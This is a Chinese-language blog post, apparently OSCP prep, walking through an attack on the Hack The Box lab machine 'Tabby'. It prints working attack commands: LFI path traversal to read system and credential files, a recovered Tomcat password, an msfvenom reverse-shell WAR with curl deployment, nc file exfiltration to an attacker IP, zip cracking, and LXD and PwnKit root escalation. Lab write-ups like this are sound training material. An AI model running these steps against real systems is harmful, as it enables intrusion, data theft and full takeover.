OSCP备考_0x29_HackThBox靶机_Linux_tabby

Ethan医生5个月前靶场188

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.173.82 (扫描UDP)



gobuster dir -u http://megahosting.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html





需要绑定HOST

megahosting.htb

http://megahosting.htb/

image.png

http://megahosting.htb/news.php?file=../../../../../etc/passwd,发现一个lfi


image.png




http://megahosting.htb:8080/

image.png

正常的是在这个路径下usr/share/tomcat9/conf/tomcat-users.xml

去看了题本是etc下的这是因为这台机器是debian系统

使用lfi去看./../../../../../../usr/share/tomcat9/etc/tomcat-users.xml默认凭证


image.png

tomcat,$3cureP4s5w0rd123!

没有找到利用的地方直接上传木马

先生成一war包

msfvenom -p java/shell_reverse_tcp lhost=10.10.16.31 lport=3333 -f war -o shell.war

image.png

然后使用curl,将war上传

curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.173.82:8080/manager/text/deploy?path=/rong --upload-file shell.war

访问http://10.129.173.82:8080/deploy?path=/rong

image.png

权限提升

查看网站目录,发现file目录下存在zip文件,如图:

nc -lvnp 4444 > file.zip

将文件下载下来

nc 10.10.16.31 4444 < 16162020_backup.zip

然后爆破ZIP密码

zip2john file.zip > passwd.txt

john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt 

image.png

发现密码是admin@it


有可能这也是ash密码 尝试看看

尝试使用su命令和改密码切换用户成功,如图:

image.png

没有可利用的文件,使用提权辅助脚本LinEnum.sh枚举,如图:

image.png

LXD权限滥用 

通过搜索引擎搜索发现Lxd权限提升,按照其利用步骤在Kali Linux分别执行:


git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine



lxc image import ./alpine-v3.12-x86_64-20200714_0459.tar.gz --alias nhpt

lxc init nhpt ignite -c security.privileged=true

lxc config device add ignite nhpt disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

先执行前两步导入到镜像,并初始化镜像到ignite容器,



还有另外一个方法

# 下载利用代码

git clone https://github.com/berdav/CVE-2021-4034.git

cd CVE-2021-4034

make

./cve-2021-4034  # 获取root shell


标签: OSCP

相关文章

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。